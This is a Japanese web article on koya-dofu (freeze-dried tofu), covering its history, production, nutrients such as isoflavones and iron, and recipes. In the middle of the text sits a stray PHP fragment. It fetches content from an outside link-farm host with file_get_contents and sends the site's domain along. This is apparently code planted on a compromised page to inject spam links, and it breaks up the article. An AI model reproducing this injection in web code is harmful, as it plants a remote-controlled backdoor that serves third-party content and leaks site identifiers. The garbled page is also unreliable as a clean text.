前へ
次へ

健康食とされる高野豆腐を活用する

日本独特の食材として世界においても人気があるのが豆腐です。
豆腐は元々は中国や東南アジアなどで作られていたものが日本に伝来したとされます。
ただ今の日本の豆腐と全く同じものはなく、欧米などで健康食として使われている豆腐は日本のものが多くなっています。
豆腐は大豆をすりつぶした後に煮て、その中から液体部分である豆乳だけににがりを加えて作ります。
しばらくすると固まってくるので、これで豆腐の出来上がりです。
大豆はそのままであれば保存できますから、食べたいときに作ればよく本来は作った豆腐を保存する必要はありません。
しかし豆腐を保存する方法が昔からあり、今も保存できるタイプのとうふが知られています。
正式名称としてはしみ豆腐と言われていますが、広く知られている名称としては高野豆腐になるでしょう。
その名の通り和歌山県の高野山において保存食、精進料理のために作られていたようで、その他にも気候の低くなる地域などで良く作られています。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

高野豆腐はしみ豆腐の他に氷豆腐とも言われています。
それは凍らせてから乾燥させる工程を取るためです。
一旦乾燥させた後水で戻すと以前のとうふのように箸で簡単に切れるような柔らかさはありません。
弾力がある食べ物になり、煮しめなどに使うとだしをしっかり浸透させることができます。
元々は豆腐から作られるので栄養成分も豆腐と同じのように感じますが、実際は高野豆腐独特の栄養成分などが含まれています。
豆腐は大豆から造られるので大豆イソフラボンが含まれているのは分かりますが、それ以外に鉄分が豊富に含まれています。
高野豆腐が健康食となる人として女性を挙げることがありますが、大豆イソフラボンが女性ホルモンの働きをしてくれ、鉄分が貧血を予防してくれるからになるでしょう。
煮物料理が良く知られているためにそれ以外の調理方法が分からない人もいるようです。
水で戻した後にフライパンで焼けばステーキのようになりますし、スイーツの材料として使ったりもできます。

Page Top